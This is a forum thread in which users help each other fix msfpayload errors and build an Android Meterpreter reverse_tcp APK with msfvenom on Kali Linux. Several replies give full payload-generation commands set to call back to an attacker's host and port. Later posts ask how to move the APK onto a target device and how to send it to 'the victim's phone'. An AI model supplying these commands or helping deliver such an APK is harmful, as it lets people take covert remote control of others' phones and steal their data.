Forum Thread: Hi All. Im Trying to Create the APK File to Use as a Reverse Tcp with Kali Linux but When I Type the Command

msf payload android/meterpreter/reversetcp LHOST=192.192.192.192 LPORT=8080 R > /root/Desktop.payload.apk

it says msfpayload NO SUCH FILE OR DIRECTORY ive tried many different ways and this use to work fine before. all of the tutorials say the same code but nothing is woking. same error

IP address changed for obv reasons

12 Responses

msfpayload android/meterpreter/reverse_tcp LHOST=192.192.192.192 LPORT=8080 R > /root/Desktop.payload.apk

is working fine on my kali 1.1.0a

but you might as well try

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.192.192.192 LPORT=8080 R > /root/Desktop.payload.new.apk

as msfpayload is deprecated.

Because you wrote "msf payload" and then it tells you "msf payload no such file or directory" you should try "msfpayload" but since msfpayload is deprecated as TRIPHAT said use "msfvenom" it should work perfectly.

a novice question may be,but how to transfer the apk file from virtual box to target android or guest win7????

Multiple ways, like

• Copy paste from guest <-> host (I used this on VMWare)
  • USB drive (plug it to the host, then change it to guest or vice versa)
  • Using ftp / http / smb

copy paste /drag n drop not working for guest to host.

usb drive plugged into host.from thereon went to devices>usb and found alien looking usb codenames.if u may provide a little layman help overhere.

Not sure if you have to install VMWare tools first to enable copypaste or dragndrop...

Unplug the usb. Watch the alien codenames. Plug the usb. Watch the names again. The one that is added, is your usb drive. That's the fastest way if you can't recognize it by its name.

Why don´t you use MsfVenom?

try this msfvenom -p android/meterpreter/reversetcp LHOST=your ip LPORT=4444 R > android.apk

the apk file should be created in your home folder

after creating an .apk file, it not installing on any android devices...

How do you send the apk files to the victim's phone?

Share Your Thoughts

• Hot
  • Active